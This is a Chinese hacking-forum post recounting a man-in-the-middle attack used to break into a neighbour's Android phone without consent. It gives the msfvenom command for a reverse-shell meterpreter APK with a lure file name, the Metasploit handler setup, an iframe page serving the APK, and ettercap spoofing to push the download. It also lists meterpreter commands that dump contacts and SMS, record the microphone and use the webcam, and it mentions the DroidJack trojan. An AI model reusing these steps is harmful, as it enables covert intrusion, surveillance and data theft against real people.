找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
返回列表 发新帖
查看: 2102|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

# b$ [: J! K G. b 五、msf+ettercap入侵邻居安卓手机 ( T! G! `* D* J+ J. b" b

+ C+ s4 d) E. u( B0 V

) \' C; b# W# J 首先启动msf / p) b" M5 q. @7 P3 F0 R% V

! E( g: c* B4 M: D; ?2 D2 H) b/ i

4 l7 ~5 X& k( m 先用kali生成一个安卓木马,如下命令: : X0 H; `% `1 \( ]8 D% U

" S3 m2 t# g _. L7 e2 {

. h; d6 o& x% B: P/ m/ c Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 8 f2 |/ g1 Z3 W8 a# ~( ?

- J5 k) h& |5 w( ?' x3 u

6 L, a0 W' i4 e. F! t6 n 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 , L% I _. [1 c4 e0 _& H, {8 v

6 I5 j( D0 F, ]

4 M3 i1 o% ]. c9 c 然后进入msf 2 t" t3 T/ ^% E* V$ B( g

, v$ n+ I$ c- ]

) c* K5 e9 w4 ~) Q use exploit/multi/handler 0 {9 [6 }, g3 o

7 _, Z0 @2 c0 O3 L: B _6 h

6 D& H7 D! a8 w set payload android/meterpreter/reverse_tcp 7 r7 \* l" [0 H) e

* `: p" F4 ^& Y7 Q" d

. U# x" z( w1 l set LHOST 192.168.0.109 //ipkailiip 4 _2 @7 Z- G: {* M! b, B

0 l7 i! ~# E) Z. ^* @

6 y) a! F5 j2 R% L set LPORT 44444 //端口一定要与前面生成的木马的端口一致 5 U% R* f: l& P5 f

* {1 l" T/ J( \( f/ t

6 }) B$ J1 F3 o! V Exploit 5 o- O8 l c, E" O/ s9 R8 a, v

9 D5 c8 o* Q- A) G1 F8 ^ A% o

9 U8 ~0 n3 P! ^8 ]   4 i" j G* K1 x4 G5 U. L/ E

9 x2 K' q! `) S5 x3 w

$ \$ `0 g; R- l, ? 下面我们开启ettercap -G . m/ y* c" d N1 T& {) h

2 D1 |2 |; F, v2 G

, S7 \9 Y4 S. |' B* d( A 我物理IP ! V7 E7 F" e3 L# q/ ~# d* {. t

8 \' w$ c0 }: w' _1 E9 s" ?

% n# x {1 w% F0 B   7 I: Q V6 I1 b* ^2 n

- ~: _' K6 t% N4 \5 {

$ j) I. X0 D9 o6 {& r9 |. p9 b 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, * `( r: I4 M z$ ?) ^+ F, t

6 x0 V, u/ } c7 ?7 O* D; E# y

6 ^: P5 \# {; E8 S; [( R. H. f 下面我们来设置一下 ! r- t1 N& h+ t, G$ j) v

3 {* ]+ z/ A. _2 n: ]4 u7 b3 J

: g7 N1 w& z0 S8 n+ Y0 g: v   3 X8 }* O$ f" {% |. D1 c5 V5 |

# h% j; M7 a' W4 X

6 ~+ Y5 ~4 q4 T8 |5 W 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, & }1 ]3 c: ]: G5 X" r% X9 P4 n2 T+ e

& N# E- x/ {9 w

) }& L; V3 o. i- k& W3 O- `   0 W4 A1 x& e: O2 \% a6 ]8 V

# r9 F5 U/ @( X1 f- p

6 {5 D$ R- G, R& Q. l1 \   / _' h% ?9 M9 `. k5 o& {

$ L( x& P- u7 s, m! h

4 a0 h4 T# _+ b" p   . |, L4 u1 E& p7 U

& U4 P. j1 x+ q3 H' K

, I0 }( C" ]+ c; ^% D7 ?6 `- ~   % D2 `/ k4 e# H7 x5 X5 W

, p* G2 ?; E! Y4 |

% E) H' b# n" `- Y' {8 x6 o5 h   1 d8 h0 F: K0 m' g8 M g7 C, M

- s: B* |0 _, \% J( N2 P5 ^4 R+ h

! A8 r x% o, L5 C" c* e) y0 j" A Q   ( G, `" l6 F6 i+ u: }

) p% w9 |0 C. W9 G, ^) r

$ E4 E2 E8 a8 U" _% @# B   / l# |4 S1 b* e' ~; K; C/ l) [4 r

, _4 q" ~5 [% a( T" g% c& t

7 Y0 |/ ?- T. }) f5 d   . J/ B& X3 A/ _4 y! p

( Z. [8 @& w/ _4 P

# q+ F3 v; u' l: W   3 G% r \2 r. [. k' i- ?- G0 p

$ B% m9 g. E% {

8 R4 L0 t% s4 @# z+ n1 g1 n. t, j   . P0 a. B/ `2 [6 G

; F& c, e4 H$ h4 m

5 d+ [, D4 \; e9 p1 |   , _1 s ~! K- u$ ^6 n

7 O/ s, a: a3 x( L) Q) N5 `9 P

$ K& t; ~% o- u5 N7 u1 Y   9 k v% q' B" u* b

6 [0 E r8 V6 S$ `* ?

) S3 }3 A9 F9 R% G   5 t$ y6 s- m/ v; W' ?

; V5 V+ X+ j! p& Y" v0 ?! V1 A

8 c# U- G$ w/ R5 ^ x2 O: E( j W 下面我们开始攻击 - H( T& d. k" n8 U" m7 v

) f+ P+ `9 ^: R- L& ], ~ n" T

) a" A: I. @5 d9 P9 z) H7 u   - t* w' M( f9 b" I

6 S- I0 s) x2 s

4 K4 u/ ^7 K: @/ t( K   1 y% U2 g. Z4 B% I8 I

3 h( r+ B) N V1 l

3 x+ P3 s) `* g# b1 \* b   ( y% l u, J2 f) L, ?* ^* x

: @; o2 f8 B+ X$ c, L2 C

8 E8 F9 w$ g' V   " c" b' Q- p6 C% i% D

6 D3 c7 g* n" Z. K" ^) i

5 b. j% ?9 t, ^1 m6 c   # X5 i0 S% _- B8 S2 F6 s

. F$ M y* }3 I/ M- E$ i/ }2 d' I

8 \$ N7 M* J2 j7 k3 H. P 大概过了5分钟多,发现反弹成功了 . O4 {( A' V- q5 N1 c

9 }: H3 H3 d! i* Z0 N, N

% H/ J' d: l8 S) F4 w- K   & Z( e$ Z/ z, Z. h

6 w% \# W2 ~8 k" \- y8 W: J$ V

4 C* L3 g+ p, U! {6 m   - Y2 g: D& E) a( y2 y1 l

3 z( z* f+ B/ \# K; m9 F

# T: q3 V" T, i& j0 K" p# i- s' A   ; f3 b0 b" u b6 U' u1 |

% D) w2 ?: f9 n. [9 z! q; f

/ L2 ]: L7 B' L: H6 K/ R   5 U( M3 ]3 ?) o

6 K( w9 |5 q/ Y0 N, v# B5 `

, M0 s% x! a6 h& c" I   0 j" e; p) M1 g+ K" H

* L+ Q' q7 {6 m$ M$ s( i

, z. u g- I+ o- S# g" `   , ^5 f [7 p; c2 K

. W( X! ^& t' b$ E

1 Y" y2 [: g, f9 Q0 v1 v5 }   3 ]. }% Y, ^# M* V' ?

3 k6 |+ ^4 X, r3 T6 F2 P

- p2 R( O" j" u& A 执行命令 9 p- F% l6 a6 T5 t9 u# [% }

+ l1 J0 o& z: A1 ]

/ g V$ T5 s! s3 ^0 M   $ d* |% s1 f. n. Q$ K" v

( j% ?+ N) f2 c* C5 k6 X5 m& G& n

7 ?6 ?, k9 Z' K: w* G dump_contacts    --》这个是导出电话 " ?, E& `, @' U( }3 X/ h9 o; P$ I

8 L: e" d0 \( u

8 W' e0 ] ]$ P u C) n A* y dump_sms --》这个是导出信息 5 y" u9 M6 Q% B, q

& E# e! ~% u; [ e

' o; E3 k; C3 U- O" W record_mic     Record audio from the default microphone for X seconds 3 H/ i3 R8 W. w" I9 R

0 J" H. b$ G4 ~$ b. Q

6 W9 I" L; R M2 J& H) R     webcam_chat    Start a video chat ' d! n0 x& i8 `0 h5 ]- h; Q8 l- q

2 c8 a* b+ K6 A( B

# H+ D: }! v* J/ B6 L3 R) T3 I     webcam_list    List webcams - y4 a% n2 u$ K% ~; Z' m( }% E

% @: m0 T4 g9 W% ^. t a

3 h1 ?* j) `0 n1 z: \9 V# {8 o6 {     webcam_snap    Take a snapshot from the specified webcam 0 |0 ~: d) R* ]' E7 W3 T K

- ~# z* [8 N9 b/ v. q9 F

, Y: g% n9 A' H$ l( J1 { webcam_stream  lay a video stream from the specified webcam # ~3 j( X/ P" _

; Y0 a8 X7 F, S8 ~0 N. C( R

: s: `/ _1 r+ v" |8 g* i2 [% J   $ s h8 d7 P7 R! _

8 b. Z% m& L$ u! S; `* G$ V$ U

# s$ z4 P( t8 I: Q5 E7 Q   ) V* a/ p4 p5 [- A' w

6 M' W5 f; q. E. ] S

" {( @2 y' Q* D- v5 }! B 我们打开看一下电话薄, ' I: y' }* e5 Q( Z. x

0 h7 J8 ]7 M! H, Y# R( C

5 J8 `: s$ g4 @7 y/ O- E/ j   + Y0 \. \" M6 I

1 H$ X6 b4 R v$ }

! O) ^5 ^& l% L1 x/ ]* D   / q4 V/ s4 z6 g8 E Y D. O3 x4 |

( v0 y+ V) U. u/ i3 m

# ` Y% S4 Q& Y. @1 a: C' n   2 O4 j6 F) t% |5 M: p

) V1 j1 P. L3 `& G" [; R

6 E8 m( Q+ f6 B" a2 k   % k6 b7 l! {8 j* b/ c2 E; c8 v

5 N; M; m5 o$ j9 x

+ F$ D3 B( |# w   $ T$ s ~8 i" R

) U- c7 L( Z/ }5 R" N7 A5 ?

' |% O) {. M; r g   g" q2 M9 _% n) ^# r

v6 L6 p* I9 c; R% a- W- v% `9 {

z7 f7 l8 f$ J, ~/ o 我们同时欺骗成DroidJack木马,使用方法如图: 5 K( U( _+ e( g, k6 s# m T0 \) s

1 S* v9 Z# d% g- _) m# K

/ r3 S! z! Y' l8 S1 D( U' I% V; N   % X8 v) u) G$ O6 r0 K$ m

6 K& m' b% \' k" J" Z+ @; ~; s

3 Z# ~0 k: S# c3 W" e1 x& ^   0 e# \6 \. U" [$ g

2 x9 V$ W' Z8 j% a! U4 X6 u+ [

5 n, c" V/ X8 R& K   8 ]; j0 x2 i0 s$ [

. m# i3 H* Q$ J4 s0 s( x

$ m+ l9 T9 K$ S& _9 a# I2 C) l 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 ! E4 _* D% @5 u4 y* @$ t) H

, k+ ]7 ~* f6 e3 H: S# |* u! C) o

2 J( K$ w) f8 A: b0 i   9 c2 q8 F1 H: P m/ n6 `$ |3 [

K# |4 g, z; D7 V

1 k& W. q; x% D   % a: D3 E; Q% X3 n

9 A7 C8 f8 j6 M3 C

" \( a! s+ o4 o2 Z0 B2 e5 n2 V   6 M- J# R6 `2 @4 h9 o

4 _" ^/ w2 ?& Y0 F

( A6 S0 L, k u' k/ K 0 @( C* m8 S8 A4 p1 u ]

( z4 O% p% G% F: b8 |. C- o

8 e0 ]3 [- ]; ?9 P. h
, F$ r2 g" V& s+ H! W# D

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表